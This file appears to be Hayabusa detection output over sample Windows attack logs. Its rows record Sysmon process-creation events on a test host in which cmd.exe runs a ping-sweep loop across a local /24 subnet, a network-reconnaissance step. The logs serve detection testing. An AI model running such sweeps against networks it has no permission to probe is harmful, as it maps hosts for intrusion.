2019-07-19 23:53:11.504 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.194 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 1104 | PGUID: 747F3D96-D957-5D31-0000-001072CF3600",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:53:12.040 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.195 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 5244 | PGUID: 747F3D96-D958-5D31-0000-00105ED23600",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:53:12.537 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.196 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 4460 | PGUID: 747F3D96-D958-5D31-0000-001026DB3600",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:53:13.022 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.197 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 3352 | PGUID: 747F3D96-D959-5D31-0000-001016DE3600",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:53:13.509 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.198 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 1136 | PGUID: 747F3D96-D959-5D31-0000-001007E13600",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:53:14.020 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.199 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 936 | PGUID: 747F3D96-D95A-5D31-0000-0010F7E33600",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:53:14.513 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.200 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 4480 | PGUID: 747F3D96-D95A-5D31-0000-0010EBE63600",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:53:15.001 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.201 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 6464 | PGUID: 747F3D96-D95A-5D31-0000-0010DBE93600",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:53:15.518 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.202 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 2392 | PGUID: 747F3D96-D95B-5D31-0000-0010CCEC3600",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:53:16.026 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.203 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 2624 | PGUID: 747F3D96-D95C-5D31-0000-001039F03600",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:53:16.521 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.204 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 6804 | PGUID: 747F3D96-D95C-5D31-0000-0010F7F53600",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:53:17.037 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.205 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 884 | PGUID: 747F3D96-D95D-5D31-0000-001001F93600",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:53:17.438 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.206 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 5828 | PGUID: 747F3D96-D95D-5D31-0000-0010C8013700",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:53:18.043 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.207 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 3436 | PGUID: 747F3D96-D95E-5D31-0000-0010B5043700",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:53:18.544 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.208 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 6296 | PGUID: 747F3D96-D95E-5D31-0000-0010A1073700",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:53:19.012 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.209 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 4660 | PGUID: 747F3D96-D95F-5D31-0000-0010930A3700",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:53:19.546 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.210 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 6184 | PGUID: 747F3D96-D95F-5D31-0000-00107F0D3700",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:53:20.009 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.211 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 3932 | PGUID: 747F3D96-D960-5D31-0000-00106B103700",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:53:20.571 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.212 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 980 | PGUID: 747F3D96-D960-5D31-0000-001057133700",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:53:21.020 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.213 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 4944 | PGUID: 747F3D96-D961-5D31-0000-0010891F3700",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:53:21.520 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.214 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 2892 | PGUID: 747F3D96-D961-5D31-0000-001075223700",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:53:22.035 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.215 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 7164 | PGUID: 747F3D96-D962-5D31-0000-001061253700",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:53:22.520 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.216 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 5124 | PGUID: 747F3D96-D962-5D31-0000-0010292E3700",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:53:23.011 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.217 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 1996 | PGUID: 747F3D96-D963-5D31-0000-001016313700",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:53:23.546 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.218 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 2884 | PGUID: 747F3D96-D963-5D31-0000-001002343700",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:53:23.993 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.219 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 3896 | PGUID: 747F3D96-D963-5D31-0000-0010EF363700",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:53:24.504 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.220 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 6856 | PGUID: 747F3D96-D964-5D31-0000-0010DB393700",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:53:25.008 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.221 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 4932 | PGUID: 747F3D96-D965-5D31-0000-0010C73C3700",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:53:25.544 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.222 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 1220 | PGUID: 747F3D96-D965-5D31-0000-0010B53F3700",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:53:26.004 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.223 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 5792 | PGUID: 747F3D96-D965-5D31-0000-0010A1423700",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:53:26.430 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.224 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 5656 | PGUID: 747F3D96-D966-5D31-0000-00108D453700",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:53:27.009 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.225 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 6632 | PGUID: 747F3D96-D967-5D31-0000-00107C483700",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:53:27.555 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.226 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 5844 | PGUID: 747F3D96-D967-5D31-0000-0010BB513700",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:53:28.035 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.227 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 6396 | PGUID: 747F3D96-D968-5D31-0000-001001553700",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:53:28.511 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.228 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 1452 | PGUID: 747F3D96-D968-5D31-0000-0010F3573700",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:53:29.009 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.229 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 112 | PGUID: 747F3D96-D969-5D31-0000-0010DF5A3700",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:53:29.534 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.230 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 4004 | PGUID: 747F3D96-D969-5D31-0000-0010CB5D3700",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:53:30.034 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.231 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 5468 | PGUID: 747F3D96-D96A-5D31-0000-0010B7603700",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:53:30.521 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.232 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 6600 | PGUID: 747F3D96-D96A-5D31-0000-0010A3633700",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:53:31.013 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.233 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 6220 | PGUID: 747F3D96-D96B-5D31-0000-001090663700",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:53:31.530 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.234 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 5016 | PGUID: 747F3D96-D96B-5D31-0000-00107C693700",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:53:32.058 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.235 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 976 | PGUID: 747F3D96-D96C-5D31-0000-00106A6C3700",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:53:32.614 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.236 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 5488 | PGUID: 747F3D96-D96C-5D31-0000-0010BA763700",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:53:33.018 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.237 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 3228 | PGUID: 747F3D96-D96D-5D31-0000-0010A7793700",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:53:33.548 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.238 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 2804 | PGUID: 747F3D96-D96D-5D31-0000-0010937C3700",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:53:34.005 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.239 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 4532 | PGUID: 747F3D96-D96D-5D31-0000-0010827F3700",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
